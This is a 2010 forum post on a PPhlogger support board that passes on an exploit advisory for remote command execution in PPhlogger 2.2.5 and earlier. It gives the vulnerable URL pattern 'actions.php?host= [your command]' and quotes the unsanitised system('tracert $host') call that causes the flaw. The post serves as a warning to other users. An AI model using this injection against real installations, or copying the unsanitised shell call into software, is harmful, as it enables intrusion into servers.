Security issue

Get help with installation and running PPhlogger 2.2.x here.
Please do not post bug reports or feature requests here.

Moderators: Moderator Team, Development Team

Security issue

Postby Razr on Mon Jun 07, 2010 1:55 pm

Heads up everyone:

Remote Command Execution Vulnerability
========================================================================
PPhlogger <== 2.2.5 (trace.php)

[+] Author : Sn!pEr.S!Te Hacker #
# [+] Email : sniper-site@HoTMaiL.coM #
# [+] T34M Sn!pEr.S!Te Hacker #
# [+] 27-5-2010 #
# [+] Script :lmage » PPhlogger #
# [+] Download:http://sourceforge.net/projects/pphlogger/files/pphlogger/2.2.5/pphlogger-2.2.5.zip/download #
# Version: [2.2.5] #

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=
Exploit : pphlogger/actions.php

http://localhost/pphlogger/actions.php?host= [your command]

http://127.0.0.1/pphlogger/actions.php?host= [your command]

system("tracert $host");

line: 56

More over at: http://www.exploit-db.com/exploits/12766/
Razr
 
Posts: 2
Joined: Tue Apr 29, 2008 4:34 pm

Return to PPhlogger Support

Who is online

Users browsing this forum: Baidu [Spider], Majestic-12 [Bot] and 4 guests

cron